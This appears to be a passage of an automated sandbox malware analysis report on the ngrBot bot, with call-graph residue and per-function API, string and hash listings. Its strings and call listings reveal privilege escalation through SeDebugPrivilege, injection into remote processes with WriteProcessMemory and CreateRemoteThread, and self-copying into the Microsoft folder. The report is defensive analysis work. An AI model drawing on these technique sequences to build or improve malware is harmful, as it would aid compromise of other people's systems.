4038c0 RtlAnsiStringToUnicodeString 10424->10427 10426 4038a5 10426->10312 10428 4038f6 LdrGetDllHandle 10427->10428 10429 4038ee 10427->10429 10428->10312 10429->10312 10431 403760 LdrGetProcedureAddress 10430->10431 10432 403784 LdrGetProcedureAddress 10430->10432 10431->10315 10432->10315 10498 4035d0 10434->10498 10436 404c31 OpenProcessToken 10437 404c48 LookupPrivilegeValueA 10436->10437 10438 404c3c GetLastError 10436->10438 10439 404c72 AdjustTokenPrivileges 10437->10439 10440 404c5c GetLastError CloseHandle 10437->10440 10438->10317 10441 404ca3 GetLastError 10439->10441 10442 404ca9 CloseHandle 10439->10442 10440->10317 10441->10442 10442->10317 10444 40359f 10443->10444 10450 403451 10443->10450 10444->10314 10445 40348c printf printf 10447 4034c2 10445->10447 10448 4034c7 printf 10445->10448 10447->10448 10499 4035d0 10448->10499 10449 40355a 10451 403593 10449->10451 10507 403320 10449->10507 10450->10444 10450->10445 10450->10449 10451->10314 10454 4034f1 NtAllocateVirtualMemory 10454->10444 10457 403500 10454->10457 10456 4031d0 2 API calls 10456->10451 10457->10444 10500 403100 10457->10500 10459 40354a 10460 403440 6 API calls 10459->10460 10461 403551 10460->10461 10461->10314 10462->10375 10464 4030f1 10463->10464 10465 4030cb 10463->10465 10464->10391 10465->10464 10466 4030e7 RtlInitializeCriticalSection 10465->10466 10466->10464 10468 403230 10467->10468 10469 4031dc 10467->10469 10468->10392 10469->10468 10470 4031e9 EnterCriticalSection 10469->10470 10471 4031f3 10469->10471 10470->10471 10472 403227 10471->10472 10473 40321d LeaveCriticalSection 10471->10473 10472->10392 10473->10472 10477 40457a 10474->10477 10475 4046fd 10475->10405 10476 404470 4 API calls 10476->10477 10477->10475 10477->10476 10478 4045b9 _snprintf 10477->10478 10479 4045ed CreateFileMappingA 10477->10479 10478->10477 10478->10479 10479->10475 10480 404621 MapViewOfFile 10479->10480 10480->10477 10481 404706 CloseHandle 10480->10481 10481->10405 10483 404890 
10482->10483 10484 40488b 10482->10484 10485 4048a4 10483->10485 10486 404897 CloseHandle 10483->10486 10484->10404 10487 4048b7 UnmapViewOfFile 10485->10487 10488 4048cc 10485->10488 10486->10485 10487->10485 10489 4048da CloseHandle 10488->10489 10490 4048ef 10488->10490 10489->10488 10490->10404 10492 404536 10491->10492 10493 40448e _snprintf OpenFileMappingA 10491->10493 10492->10408 10494 404530 10493->10494 10495 4044e2 MapViewOfFile 10493->10495 10494->10408 10495->10492 10496 404516 CloseHandle 10495->10496 10496->10494 10497->10426 10498->10436 10499->10454 10501 403161 10500->10501 10502 40310c 10500->10502 10501->10459 10502->10501 10503 403119 EnterCriticalSection 10502->10503 10504 403123 10502->10504 10503->10504 10505 403158 10504->10505 10506 40314e LeaveCriticalSection 10504->10506 10505->10459 10506->10505 10508 403332 10507->10508 10509 403385 10507->10509 10508->10509 10510 40333c EnterCriticalSection 10508->10510 10511 403346 10508->10511 10509->10456 10510->10511 10511->10509 10512 40337b LeaveCriticalSection 10511->10512 10512->10509 10514 4049df 10513->10514 10516 404910 10513->10516 10514->10323 10515 404933 WaitForSingleObject 10517 404982 10515->10517 10521 404943 10515->10521 10516->10514 10516->10515 10517->10323 10518 404979 ReleaseMutex 10518->10517 10519 404470 _snprintf OpenFileMappingA MapViewOfFile CloseHandle 10519->10521 10520 4049b2 10523 404470 4 API calls 10520->10523 10521->10517 10521->10518 10521->10519 10521->10520 10522 4049a2 ReleaseMutex 10521->10522 10522->10323 10524 4049b7 10523->10524 10525 404470 4 API calls 10524->10525 10526 4049c1 ReleaseMutex 10525->10526 10526->10323 10537 410f10 10528->10537 10531 401e60 10532 40a3ba _snprintf lstrlenA sprintf lstrlenA lstrlenA 10531->10532 10533 40a419 10532->10533 10534 40a431 EnterCriticalSection CreateFileA 10533->10534 10535 40a473 WriteFile CloseHandle Sleep LeaveCriticalSection 10534->10535 10536 40a45f LeaveCriticalSection 10534->10536 10535->10329 10536->10329 
10538 40a31d 6 API calls 10537->10538 10538->10531 10540 404a00 10539->10540 10541 404acb 10539->10541 10540->10541 10542 404a0b WaitForSingleObject 10540->10542 10541->10335 10542->10541 10543 404a1e 10542->10543 10544 404560 8 API calls 10543->10544 10547 404a42 10544->10547 10545 404a79 10545->10335 10546 404aad ReleaseMutex 10550 404470 4 API calls 10546->10550 10547->10545 10547->10546 10557 4047c0 10547->10557 10552 404ac6 10550->10552 10551 404a6d 10553 404a80 10551->10553 10554 404a74 ReleaseMutex 10551->10554 10552->10335 10555 404470 4 API calls 10553->10555 10554->10545 10556 404a88 ReleaseMutex 10555->10556 10556->10546 10558 4047d1 10557->10558 10559 404875 10557->10559 10558->10559 10560 4047ed InterlockedIncrement 10558->10560 10559->10551 10564 404807 10560->10564 10561 40485c 10561->10551 10562 404470 _snprintf OpenFileMappingA MapViewOfFile CloseHandle 10562->10564 10563 404560 8 API calls 10563->10564 10564->10561 10564->10562 10564->10563 10566 4068c5 10565->10566 10567 4068c6 PathAppendW 10565->10567 10566->10351 10567->10351 10569 4056ef 10568->10569 10570 4056f5 10568->10570 10569->10364 10593 402cd0 10570->10593 10572 405730 NtQuerySystemInformation 10576 405795 10572->10576 10578 40574b 10572->10578 10573 4057ff 10609 402ca0 10573->10609 10574 405815 10574->10364 10575 402cd0 4 API calls 10575->10578 10576->10573 10601 404410 10576->10601 10578->10574 10578->10575 10581 40577d NtQuerySystemInformation 10578->10581 10580 405808 10580->10364 10581->10576 10581->10578 10584 405882 10582->10584 10583 405a04 CloseHandle 10583->10364 10584->10583 10585 4058b8 CloseHandle 10584->10585 10586 4058bf NtQueryInformationProcess 10584->10586 10587 4059f7 Sleep 10584->10587 10588 4058eb NtQueryInformationProcess 10584->10588 10589 404900 8 API calls 10584->10589 10590 4049f0 13 API calls 10584->10590 10591 40596b InterlockedCompareExchange 10584->10591 10592 4042e0 15 API calls 10584->10592 10585->10586 10586->10584 10587->10584 10588->10584 10589->10584 
10590->10584 10591->10584 10592->10584 10594 402ce4 10593->10594 10595 402cde 10593->10595 10596 402d00 10594->10596 10597 402d3b 10594->10597 10600 402d08 10594->10600 10595->10572 10619 403810 GetProcessHeap RtlAllocateHeap 10596->10619 10614 403830 10597->10614 10600->10572 10602 404418 10601->10602 10603 404420 10602->10603 10604 404424 OpenProcess 10602->10604 10603->10576 10605 404447 10604->10605 10606 40443c GetLastError 10604->10606 10621 4042e0 10605->10621 10606->10576 10608 404456 CloseHandle 10608->10576 10610 402caa 10609->10610 10611 402cac 10609->10611 10610->10580 10613 402cbe 10611->10613 10670 4037f0 GetProcessHeap HeapFree 10611->10670 10613->10580 10615 403848 GetProcessHeap HeapReAlloc 10614->10615 10616 40383a 10614->10616 10615->10600 10620 403810 GetProcessHeap RtlAllocateHeap 10616->10620 10618 403843 10618->10600 10619->10600 10620->10618 10622 4042eb 10621->10622 10623 4042f3 10622->10623 10644 4042a0 10622->10644 10623->10608 10626 404310 10626->10608 10627 404323 VirtualAllocEx 10628 40433a 10627->10628 10629 40439f GetLastError 10627->10629 10630 404341 WriteProcessMemory 10628->10630 10631 404356 10628->10631 10633 4043ba 10629->10633 10634 4043af VirtualFreeEx 10629->10634 10630->10629 10630->10631 10631->10629 10647 404160 10631->10647 10635 4043c1 VirtualFreeEx 10633->10635 10636 4043cc 10633->10636 10634->10633 10635->10636 10636->10608 10637 404374 10637->10629 10638 40437e CreateRemoteThread 10637->10638 10638->10629 10639 4043d5 10638->10639 10662 4037f0 GetProcessHeap HeapFree 10639->10662 10641 4043dc 10642 4043f4 CloseHandle 10641->10642 10643 4043e6 10641->10643 10642->10608 10643->10608 10645 4042ad IsWow64Process 10644->10645 10646 4042bf 10644->10646 10645->10646 10646->10626 10646->10627 10646->10628 10663 404020 10647->10663 10649 40417f VirtualAllocEx 10650 4041a5 10649->10650 10651 40428c 10649->10651 10652 404020 2 API calls 10650->10652 10651->10637 10655 4041b4 10652->10655 10653 404270 VirtualFreeEx 10653->10651 
                                                                  • Call-graph edge list (rendered graph residue; node identifiers and edges not reproduced as text). Functions on the graph are at 004037f0-00404286 in the 00400000 dump and 00362ca0-00366033 in the 00360000 dump. API calls attached to graph nodes: GetProcessHeap, HeapAlloc, HeapReAlloc, HeapFree, RtlAllocateHeap, WriteProcessMemory, ReadProcessMemory, NtQueryInformationProcess, NtQuerySystemInformation, NtAllocateVirtualMemory, LdrEnumerateLoadedModules, LdrLoadDll, LdrGetProcedureAddress, LdrGetDllHandle, RtlAnsiStringToUnicodeString, GetPEB, GetVersionExA, GetNativeSystemInfo, IsWow64Process, CreateThread, CreateRemoteThread, OpenProcess, CloseHandle, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, GetLastError, CreateMutexA, WaitForSingleObject, WaitForMultipleObjects, ReleaseMutex, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, InterlockedIncrement, InterlockedCompareExchange, CreateFileMappingA, OpenFileMappingA, MapViewOfFile, UnmapViewOfFile, VirtualAllocEx, VirtualFreeEx, CreateEventA, SetEvent, CreateNamedPipeA, ConnectNamedPipe, DisconnectNamedPipe, ReadFile, GetOverlappedResult, Sleep, memset, strncpy, sprintf, _snprintf, printf.

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Control-flow graph of function 00365A20 (rendered graph residue; basic-block list not reproduced). Blocks call 003635E0, 00363A20, 00364D00, 00363080, 00363920, 003639A0, 00363750 and the APIs LdrEnumerateLoadedModules, CreateThread and CloseHandle.
                                                                  APIs
                                                                  • LdrEnumerateLoadedModules.NTDLL(00000000,00365040,g\6), ref: 00365B0D
                                                                  • CreateThread.KERNEL32(00000000,00000000,00365070,00000000,00000000,00000000), ref: 00365C03
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00365C0A
                                                                  • CreateThread.KERNEL32(00000000,00000000,003650F0,00000000,00000000,00000000), ref: 00365C3D
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00365C44
                                                                    • Part of subcall function 00363920: RtlAnsiStringToUnicodeString.NTDLL(?,?,00000000), ref: 00363962
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleStringThread$AnsiEnumerateLoadedModulesUnicode
                                                                  • String ID: LdrLoadDll$NtResumeThread$g\6$g\6$ntdll.dll
                                                                  • API String ID: 1691487058-1552861057
                                                                  • Opcode ID: 19032fc6d19f31b1a0fcfd54ade410f2cfd92bb80e1c9f8976351988598bdf00
                                                                  • Instruction ID: b1b5cff40bcc17cd21162c59e12561d87a5f1172ec8b209b1d8d2f610696a0e5
                                                                  • Opcode Fuzzy Hash: 19032fc6d19f31b1a0fcfd54ade410f2cfd92bb80e1c9f8976351988598bdf00
                                                                  • Instruction Fuzzy Hash: DD61E375B40B02ABDB22DF68CC81FA673A8BF44704F168529E805DB789D771F901CB94

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,?,00404E7E,SeDebugPrivilege,00000001,00000000,ntdll.dll,NtGetNextProcess), ref: 00404C32
                                                                  • GetLastError.KERNEL32 ref: 00404C3C
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00404C52
                                                                  • GetLastError.KERNEL32 ref: 00404C5C
                                                                  • CloseHandle.KERNEL32(?), ref: 00404C66
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CloseHandleLookupOpenPrivilegeProcessTokenValue
                                                                  • String ID:
                                                                  • API String ID: 1673749002-0
                                                                  • Opcode ID: f03f0848109c1344e6a2f5cf10159e03204b2a801caeae268af0c0d772a4c6b3
                                                                  • Instruction ID: cd08b55a34506c6a1006ed51419cf0447f88819c37ae619cecf6d360b10e5dd7
                                                                  • Opcode Fuzzy Hash: f03f0848109c1344e6a2f5cf10159e03204b2a801caeae268af0c0d772a4c6b3
                                                                  • Instruction Fuzzy Hash: AF115175A00208ABDB10DBA4DC09FAEBBB8EB4D705F018569FB09E6290DA719E048765

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Control-flow graph of function 004042E0 (rendered graph residue; basic-block list not reproduced). Blocks call 004035E0, 004042A0, 00404160, 004037F0 and the APIs VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, VirtualFreeEx, GetLastError and CloseHandle.
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 566e3e481d76894f5171262dd43e3c3fbe6268a2b3aa79397b897dea9fa663b3
                                                                  • Instruction ID: 17ae2c20974ab2b3a02811892eedffa6f42bd494a781ace9a9728c4982da2f5b
                                                                  • Opcode Fuzzy Hash: 566e3e481d76894f5171262dd43e3c3fbe6268a2b3aa79397b897dea9fa663b3
                                                                  • Instruction Fuzzy Hash: 9F3186B17002046BD7209F6AEC41F6BB7ACEB84751F14457AFE09E73D0DA75ED0086A8

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NtGetNextProcess$SeDebugPrivilege$ntdll.dll
                                                                  • API String ID: 0-503679825
                                                                  • Opcode ID: c4a0804236e7788b4098f7f275e0abd03e10ea5118c1f2739568c315aa77eb9b
                                                                  • Instruction ID: 5ed088abe51bc9704de4a451be291cc52f30af1fc387e08d9dd35c0f4901fdcf
                                                                  • Opcode Fuzzy Hash: c4a0804236e7788b4098f7f275e0abd03e10ea5118c1f2739568c315aa77eb9b
                                                                  • Instruction Fuzzy Hash: B831DBF0A4430476D620BFB69C07BAE3658AF44709F00547BFA84B72D2EEBD564097AD

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NtGetNextProcess$SeDebugPrivilege$ntdll.dll
                                                                  • API String ID: 0-503679825
                                                                  • Opcode ID: 959a34c09acb6bbde116e028ea15d575a48bcba2001aef82aee4aca5b1ef8165
                                                                  • Instruction ID: d985b870f33fec2ea17a322ac20dd4c82274ce4c4112a81b87e434a2f0ce7684
                                                                  • Opcode Fuzzy Hash: 959a34c09acb6bbde116e028ea15d575a48bcba2001aef82aee4aca5b1ef8165
                                                                  • Instruction Fuzzy Hash: 3131EA70E54204B6D723BBB9AC07BEE325C9B05B00F00C456F948AB3C6FEB55A4087A9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Control-flow graph of function 004056E0 (rendered graph residue; basic-block list not reproduced). Blocks call 00402C60, 00402CD0, 00404410, 00402CA0 and the API NtQuerySystemInformation (twice).
                                                                  APIs
                                                                  • NtQuerySystemInformation.NTDLL(00000005,?,?,?), ref: 00405741
                                                                  • NtQuerySystemInformation.NTDLL(00000005,?,?,?), ref: 0040578B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InformationQuerySystem
                                                                  • String ID: (mA
                                                                  • API String ID: 3562636166-412592806
                                                                  • Opcode ID: 54551fad4c689b88b6c56286297f79b65224b9cbcfa60a58bb591db8606bca24
                                                                  • Instruction ID: cd5f570840ed0612bd24c40dad0ef41f87404906c4f3f406656de7144237ac50
                                                                  • Opcode Fuzzy Hash: 54551fad4c689b88b6c56286297f79b65224b9cbcfa60a58bb591db8606bca24
                                                                  • Instruction Fuzzy Hash: 62418375A00619ABDB10DBA4DD81FBFB3B8EB88704F04456DE905A7380E678ED44DBA4
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000040,00000000,?,?,?), ref: 00404192
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0040424F
                                                                  • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 0040427C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFreeMemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3247110995-0
                                                                  • Opcode ID: 02f7cf14a14e9807913e6e7e1cc57f194bdd3776d6a4df443f608aa8a8b972a6
                                                                  • Instruction ID: 66c8841409591aed13a986a2bc30d40898740935292764979a82c35a27653c4f
                                                                  • Opcode Fuzzy Hash: 02f7cf14a14e9807913e6e7e1cc57f194bdd3776d6a4df443f608aa8a8b972a6
                                                                  • Instruction Fuzzy Hash: 1C31B0F2A00218ABCB20DFA5EC85B6FB768EB84754B05457DFE0977341D634EE048A98
                                                                  APIs
                                                                    • Part of subcall function 00365A20: LdrEnumerateLoadedModules.NTDLL(00000000,00365040,g\6), ref: 00365B0D
                                                                  • NtQueryInformationProcess.NTDLL(00000000,0000001B,?,00000800,00000000), ref: 00365C80
                                                                    • Part of subcall function 003649F0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,003673CC,00397C98,00000000,00000000,00000010,00000000), ref: 00364A10
                                                                    • Part of subcall function 003649F0: ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 00364A77
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: EnumerateInformationLoadedModulesMutexObjectProcessQueryReleaseSingleWait
                                                                  • String ID: STFU
                                                                  • API String ID: 2599885325-778810564
                                                                  • Opcode ID: 7c343b45f06b9c4611cd96e8dc4ba06767e0b6b014b8d2ca954ea7f556f982d8
                                                                  • Instruction ID: 28b673313a99262b3ef8c2a54ff46bac9cdcf8adf4d0c41bea9d4c55dfd22623
                                                                  • Opcode Fuzzy Hash: 7c343b45f06b9c4611cd96e8dc4ba06767e0b6b014b8d2ca954ea7f556f982d8
                                                                  • Instruction Fuzzy Hash: 6301ACB1A403086AEB51EBA49C03FBB72ECEB05700F00C1A5BA44EB180FE719954C7E5

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00410930
                                                                  • GetProcessHeap.KERNEL32 ref: 0041093D
                                                                  • memset.MSVCRT ref: 0041095D
                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00410982
                                                                  • ShellExecuteA.SHELL32(00000000,OPEN,00000000,00000000,00000000,00000005), ref: 004109BF
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407401
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407419
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 00407431
                                                                    • Part of subcall function 004073E0: _snprintf.MSVCRT ref: 00407449
                                                                    • Part of subcall function 004073E0: _vsnprintf.MSVCRT ref: 0040746B
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 0040747A
                                                                  • GetTickCount.KERNEL32 ref: 004109CF
                                                                  • Sleep.KERNELBASE ref: 00410A05
                                                                  • OpenMutexA.KERNEL32 ref: 00410A17
                                                                  • GetLastError.KERNEL32 ref: 00410A27
                                                                  • GetLastError.KERNEL32 ref: 00410A2E
                                                                  • ExitProcess.KERNEL32 ref: 00410A32
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 00410A3D
                                                                  • _snprintf.MSVCRT ref: 00410A60
                                                                  • ExitProcess.KERNEL32 ref: 00410A79
                                                                  • ExitProcess.KERNEL32 ref: 00410A98
                                                                  • GetModuleFileNameW.KERNEL32(00000000,0044AFB0,00000208), ref: 00410ACC
                                                                  • wsprintfW.USER32 ref: 00410ADE
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044ADA0,000000FF,0044AC50,00000104,00000000,00000000), ref: 00410B06
                                                                  • lstrcpynW.KERNEL32(0044B1B8,00000000,00000208), ref: 00410B13
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,0044B3E0,00000104,00000000,00000000), ref: 00410B2E
                                                                  • Sleep.KERNELBASE(000009C4), ref: 00410B59
                                                                  • ExitProcess.KERNEL32 ref: 00410B70
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Exitmemset$lstrlen$ByteCharErrorFileLastModuleMultiNameSleepWide_snprintf$CountExecuteHeapMutexOpenShellTick_vsnprintflstrcpynwsprintf
                                                                  • String ID: %08x$%s\Microsoft\%s.exe$30e44aa1$OPEN$ngrBot$running
                                                                  • API String ID: 2173303953-2917108782

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040B312
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040B319
                                                                  • memset.MSVCRT ref: 0040B339
                                                                  • memset.MSVCRT ref: 0040B354
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 0040B387
                                                                  • lstrcpynW.KERNEL32(?,?,00000004), ref: 0040B3A1
                                                                  • GetVolumeInformationW.KERNELBASE ref: 0040B3BB
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0040B3D8
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0040B3F0
                                                                  • lstrcatW.KERNEL32(00000000,.exe), ref: 0040B461
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heaplstrlenmemset$AllocDirectoryInformationProcessVolumeWindowslstrcatlstrcpyn
                                                                  • String ID: .exe$30e44aa1$lol$lol.exe
                                                                  • API String ID: 1748614950-52295467

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • strncpy.MSVCRT ref: 00404B1A
                                                                  • sprintf.MSVCRT ref: 00404B2C
                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00404B3F
                                                                  • _snprintf.MSVCRT ref: 00404B6F
                                                                  • OpenFileMappingA.KERNEL32 ref: 00404B85
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404B97
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE3
                                                                  • ReleaseMutex.KERNEL32(?,?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404C02
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Mutex$CloseCreateFileHandleMappingObjectOpenReleaseSingleWait_snprintfsprintfstrncpy
                                                                  • String ID: %s_0$-%sMutex
                                                                  • API String ID: 4144850300-892854768

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • strncpy.MSVCRT ref: 00364B1A
                                                                  • sprintf.MSVCRT ref: 00364B2C
                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00364B3F
                                                                  • _snprintf.MSVCRT ref: 00364B6F
                                                                  • OpenFileMappingA.KERNEL32 ref: 00364B85
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00364B97
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00364BE3
                                                                  • ReleaseMutex.KERNEL32(?,?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00364C02
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Mutex$CloseCreateFileHandleMappingObjectOpenReleaseSingleWait_snprintfsprintfstrncpy
                                                                  • String ID: %s_0$-%sMutex
                                                                  • API String ID: 4144850300-892854768

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00403810: GetProcessHeap.KERNEL32(00000000,00000000,?,00404046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00403819
                                                                    • Part of subcall function 00403810: RtlAllocateHeap.NTDLL(00000000,?,00404046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00403820
                                                                  • sprintf.MSVCRT ref: 0040F2E9
                                                                  • CreateFileA.KERNELBASE(00000000,00000000,00000003,00000000,00000003,00000000,00000000), ref: 0040F2FA
                                                                  • memset.MSVCRT ref: 0040F323
                                                                  • DeviceIoControl.KERNELBASE(00000000,002D1400,004109A7,0000000C,?,00000400,00000000,00000000), ref: 0040F352
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0040F35B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocateCloseControlCreateDeviceFileHandleProcessmemsetsprintf
                                                                  • String ID: \\.\%c:
                                                                  • API String ID: 3888047447-1260769427

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 004045D5
                                                                  • CreateFileMappingA.KERNEL32 ref: 004045FD
                                                                  • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000,?,?,00010000,EDB88320,00000000), ref: 00404636
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$CreateMappingView_snprintf
                                                                  • String ID: %s_%d
                                                                  • API String ID: 1261873476-1933919280

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 004044A7
                                                                  • OpenFileMappingA.KERNEL32 ref: 004044BD
                                                                  • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 004044F0
                                                                  • CloseHandle.KERNEL32(?), ref: 0040451B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseHandleMappingOpenView_snprintf
                                                                  • String ID: %s_%d
                                                                  • API String ID: 460513966-1933919280

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 003644A7
                                                                  • OpenFileMappingA.KERNEL32 ref: 003644BD
                                                                  • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 003644F0
                                                                  • CloseHandle.KERNEL32(?), ref: 0036451B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseHandleMappingOpenView_snprintf
                                                                  • String ID: %s_%d
                                                                  • API String ID: 460513966-1933919280
                                                                  APIs
